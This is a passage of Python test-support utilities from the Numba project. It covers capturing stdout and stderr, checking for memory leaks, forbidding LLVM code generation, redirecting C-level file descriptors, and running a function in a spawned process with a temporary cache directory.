setattr(sys, stream_name, orig_stdout)
def captured_stdout():
"""Capture the output of sys.stdout:
with captured_stdout() as stdout:
print("hello")
self.assertEqual(stdout.getvalue(), "hello\n")
"""
return captured_output("stdout")
def captured_stderr():
"""Capture the output of sys.stderr:
with captured_stderr() as stderr:
print("hello", file=sys.stderr)
self.assertEqual(stderr.getvalue(), "hello\n")
"""
return captured_output("stderr")
@contextlib.contextmanager
def capture_cache_log():
with captured_stdout() as out:
with override_config('DEBUG_CACHE', True):
yield out
class MemoryLeak(object):
__enable_leak_check = True
def memory_leak_setup(self):
# Clean up any NRT-backed objects hanging in a dead reference cycle
gc.collect()
self.__init_stats = rtsys.get_allocation_stats()
def memory_leak_teardown(self):
if self.__enable_leak_check:
self.assert_no_memory_leak()
def assert_no_memory_leak(self):
old = self.__init_stats
new = rtsys.get_allocation_stats()
total_alloc = new.alloc - old.alloc
total_free = new.free - old.free
total_mi_alloc = new.mi_alloc - old.mi_alloc
total_mi_free = new.mi_free - old.mi_free
self.assertEqual(total_alloc, total_free)
self.assertEqual(total_mi_alloc, total_mi_free)
def disable_leak_check(self):
# For per-test use when MemoryLeakMixin is injected into a TestCase
self.__enable_leak_check = False
class MemoryLeakMixin(MemoryLeak):
def setUp(self):
super(MemoryLeakMixin, self).setUp()
self.memory_leak_setup()
def tearDown(self):
super(MemoryLeakMixin, self).tearDown()
gc.collect()
self.memory_leak_teardown()
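# Usage sketch: mix into a TestCase so every test is checked for NRT leaks;
# call self.disable_leak_check() inside a test to opt out for that test only.
#     class TestSomething(MemoryLeakMixin, TestCase):
#         def test_no_leak(self):
#             ...  # allocations made here must be freed before teardown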
@contextlib.contextmanager
def forbid_codegen():
"""
Forbid LLVM code generation during the execution of the context
manager's enclosed block.
If code generation is invoked, a RuntimeError is raised.
"""
from numba.targets import codegen
patchpoints = ['CodeLibrary._finalize_final_module']
old = {}
def fail(*args, **kwargs):
raise RuntimeError("codegen forbidden by test case")
try:
# XXX use the mock library instead?
for name in patchpoints:
parts = name.split('.')
obj = codegen
for attrname in parts[:-1]:
obj = getattr(obj, attrname)
attrname = parts[-1]
value = getattr(obj, attrname)
assert callable(value), ("%r should be callable" % name)
old[obj, attrname] = value
setattr(obj, attrname, fail)
yield
finally:
for (obj, attrname), value in old.items():
setattr(obj, attrname, value)
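# Usage sketch (cached_func is a hypothetical already-compiled function):
#     with forbid_codegen():
#         cached_func(1)  # raises RuntimeError if LLVM codegen is invoked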
# For details about redirection of file-descriptor, read
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/
@contextlib.contextmanager
def redirect_fd(fd):
"""
Temporarily redirect *fd* to a pipe's write end and return a file object
wrapping the pipe's read end.
"""
from numba import _helperlib
libnumba = ctypes.CDLL(_helperlib.__file__)
libnumba._numba_flush_stdout()
save = os.dup(fd)
r, w = os.pipe()
try:
os.dup2(w, fd)
yield io.open(r, "r")
finally:
libnumba._numba_flush_stdout()
os.close(w)
os.dup2(save, fd)
os.close(save)
def redirect_c_stdout():
"""Redirect C stdout
"""
fd = sys.__stdout__.fileno()
return redirect_fd(fd)
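# Usage sketch: capture output written to C-level stdout (e.g. by native code),
# which captured_stdout() cannot see because it only swaps sys.stdout.
#     with redirect_c_stdout() as stream:
#         ...  # run code that prints from native code
#     data = stream.read()  # read after the block, once the write end is closed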
def run_in_new_process_caching(func, cache_dir_prefix=__name__, verbose=True):
"""Spawn a new process to run `func` with a temporary cache directory.
The child process's stdout and stderr will be captured and redirected to
the current process's stdout and stderr.
Returns
-------
ret : dict
exitcode: 0 for success. 1 for exception-raised.
stdout: str
stderr: str
"""
ctx = mp.get_context('spawn')
qout = ctx.Queue()
cache_dir = temp_directory(cache_dir_prefix)
with override_env_config('NUMBA_CACHE_DIR', cache_dir):
proc = ctx.Process(target=_remote_runner, args=[func, qout])
proc.start()
proc.join()
stdout = qout.get_nowait()
stderr = qout.get_nowait()
if verbose and stdout.strip():
print()
print('STDOUT'.center(80, '-'))
print(stdout)
if verbose and stderr.strip():
print(file=sys.stderr)
print('STDERR'.center(80, '-'), file=sys.stderr)
print(stderr, file=sys.stderr)
return {
'exitcode': proc.exitcode,
'stdout': stdout,
'stderr': stderr,
}
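# Usage sketch (child_job is a hypothetical module-level function; it must be
# importable/picklable because the child process is spawned):
#     res = run_in_new_process_caching(child_job)
#     assert res['exitcode'] == 0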
def _remote_runner(fn, qout):
"""Used by `run_in_new_process_caching()`
"""
with captured_stderr() as stderr:
with captured_stdout() as stdout:
try:
fn()
except Exception:
traceback.print_exc()
exitcode = 1
else:
exitcode = 0
qout.put(stdout.getvalue())
qout.put(stderr.getvalue())
sys.exit(exitcode)
|